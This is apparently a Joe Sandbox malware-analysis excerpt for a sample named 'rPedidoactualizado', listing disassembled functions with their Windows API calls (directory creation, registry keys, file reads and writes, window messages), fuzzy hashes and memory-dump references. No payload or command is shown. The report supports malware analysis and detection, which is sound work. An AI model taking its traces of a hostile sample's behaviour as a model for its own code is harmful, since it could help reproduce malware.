                                          • Instruction ID: 56b75d8f9ca2641e27e40e0bc5846bc1deeaaca66535f557d4a9eea11918b9db
                                          • Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                          • Instruction Fuzzy Hash: 39D01272504421AFC2512738EF0C89BBF95DF543717128B35FEE9A22F0CB314C568A98
                                          APIs
                                          • CreateDirectoryW.KERNELBASE(?,00000000,0040335F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004035B6,?,00000006,00000008,0000000A), ref: 00405851
                                          • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 0040585F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID: CreateDirectoryErrorLast
                                          • String ID:
                                          • API String ID: 1375471231-0
                                          • Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                          • Instruction ID: 569726fefb5a692a208b00f3c4627a0038051db83374957b12f20e82e1ac62f2
                                          • Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                          • Instruction Fuzzy Hash: 97C08C71211501DAC7002F318F08B073A50AB20340F15883DA64AE00E0CA308024D92D
                                          APIs
                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402343
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID: PrivateProfileStringWrite
                                          • String ID:
                                          • API String ID: 390214022-0
                                          • Opcode ID: 5fb29c7ac6bd4be6067060594f6abdd8dc98f2d64ebda3ebf196088e56367313
                                          • Instruction ID: c1725c34c84eed099ded2eadaed0aef72a921931f8640c1422412bc8ca1d20e4
                                          • Opcode Fuzzy Hash: 5fb29c7ac6bd4be6067060594f6abdd8dc98f2d64ebda3ebf196088e56367313
                                          • Instruction Fuzzy Hash: 89E086315046246BEB1436F10F8DABF10589B54305B19053FBE46B61D7D9FC0D81526D
                                          APIs
                                          • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 0040615B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID: Create
                                          • String ID:
                                          • API String ID: 2289755597-0
                                          • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                          • Instruction ID: 5f0451bdd463ed866e2305ac1dfee878cc5b4d333075ebda4e05e47d22d2a603
                                          • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                          • Instruction Fuzzy Hash: 6BE0E672110109BEDF099F50DD0AD7B371DE704304F01452EFA06D5051E6B5AD305674
                                          APIs
                                          • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403321,00000000,00000000,00403168,?,00000004,00000000,00000000,00000000), ref: 00405E24
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                          • Instruction ID: 994fac52afecd872c6575aa209eb3fbbfd601c2a51b89c6ee9ed5d101180f43c
                                          • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                          • Instruction Fuzzy Hash: 93E08C3220525AABCF109F51CC04EEB3B6CEB04360F000832FD98E2040D230EA219BE4
                                          APIs
                                          • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004032D7,000000FF,0078B6D8,?,0078B6D8,?,?,00000004,00000000), ref: 00405E53
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID: FileWrite
                                          • String ID:
                                          • API String ID: 3934441357-0
                                          • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                          • Instruction ID: 720248cc98aac2988b2abacb793a2dea5f933c74ab6652834825bf215bbdf934
                                          • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                          • Instruction Fuzzy Hash: 72E08C3220025AABCF109F60DC00AEB3B6CFB007E0F048432F951E3040D230EA208FE4
                                          APIs
                                          • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406192,?,00000000,?,?,: Completed,?), ref: 00406128
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID: Open
                                          • String ID:
                                          • API String ID: 71445658-0
                                          • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                          • Instruction ID: 68c61e8d1810f1ea9cab55705828a401d3ebcdae1eadef42580152fd7570d6fd
                                          • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                          • Instruction Fuzzy Hash: 4BD0123204020EBBDF11AE909D01FAB3B1DEB08350F014826FE06A80A2D776D530AB54
                                          APIs
                                          • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: f851741033878782bd382afd736986932f0f82490c74007ecaa1b2c921d2c013
                                          • Instruction ID: c073ba0ee5163cb04706f99935c2f3c73a5a9b1a05bee32f9da8622fc5c815d0
                                          • Opcode Fuzzy Hash: f851741033878782bd382afd736986932f0f82490c74007ecaa1b2c921d2c013
                                          • Instruction Fuzzy Hash: 68D01272B04100D7DB50DBE4AF4899D73A4AB84369B348577E102F11D0DAB9D9515B29
                                          APIs
                                          • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040426C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID:
                                          • API String ID: 3850602802-0
                                          • Opcode ID: cb0b7ebd38eb4799b8f4196fcc58e5a20f32a56ef1c2a101366cf6dcdfe2cd36
                                          • Instruction ID: 075ccd8dd3a5a116662ee2c7ada5c50e1725780f7e4f2104ac300affc7ba1253
                                          • Opcode Fuzzy Hash: cb0b7ebd38eb4799b8f4196fcc58e5a20f32a56ef1c2a101366cf6dcdfe2cd36
                                          • Instruction Fuzzy Hash: 09C04CB1744201AADE108B609D45F0777585790740F158569B350E50E4C674E450D62D
                                          APIs
                                          • SendMessageW.USER32(00000028,?,00000001,0040406E), ref: 00404251
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID:
                                          • API String ID: 3850602802-0
                                          • Opcode ID: f360a53124e97c409135d1b53ccadec94ff58fec8389da7a5f3de8c8d06ef766
                                          • Instruction ID: 5dee82f2d739acac93035fb571c052082ac1606baee7bb158d490297d0aa81d3
                                          • Opcode Fuzzy Hash: f360a53124e97c409135d1b53ccadec94ff58fec8389da7a5f3de8c8d06ef766
                                          • Instruction Fuzzy Hash: 99B09236190A00AADE614B40DE49F457A62A7A8701F00C029B240640B0CAB200A0DB09
                                          APIs
                                          • SetFilePointer.KERNELBASE(?,00000000,00000000,004030A4,?,?,00000006,00000008,0000000A), ref: 00403332
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID: FilePointer
                                          • String ID:
                                          • API String ID: 973152223-0
                                          • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                          • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                          • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                          • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                          APIs
                                          • KiUserCallbackDispatcher.NTDLL(?,00404007), ref: 0040423A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID: CallbackDispatcherUser
                                          • String ID:
                                          • API String ID: 2492992576-0
                                          • Opcode ID: efc6552eadcfffb9f020cd3683497eb6feb0237cfd1954b00ec8dcd11a4bd103
                                          • Instruction ID: 2198674f4dd135e02f2a8ae7056ebba5a8e761495b22eeaea90ee2a366c7106d
                                          • Opcode Fuzzy Hash: efc6552eadcfffb9f020cd3683497eb6feb0237cfd1954b00ec8dcd11a4bd103
                                          • Instruction Fuzzy Hash: 0AA002754455409FDF015B50EF048057A61B7E5741B61C469A25551074C7354461EB19
                                          APIs
                                            • Part of subcall function 004052FF: lstrlenW.KERNEL32(halituses,00000000,?,759223A0,?,?,?,?,?,?,?,?,?,00403257,00000000,?), ref: 00405337
                                            • Part of subcall function 004052FF: lstrlenW.KERNEL32(00403257,halituses,00000000,?,759223A0,?,?,?,?,?,?,?,?,?,00403257,00000000), ref: 00405347
                                            • Part of subcall function 004052FF: lstrcatW.KERNEL32(halituses,00403257,00403257,halituses,00000000,?,759223A0), ref: 0040535A
                                            • Part of subcall function 004052FF: SetWindowTextW.USER32(halituses,halituses), ref: 0040536C
                                            • Part of subcall function 004052FF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405392
                                            • Part of subcall function 004052FF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053AC
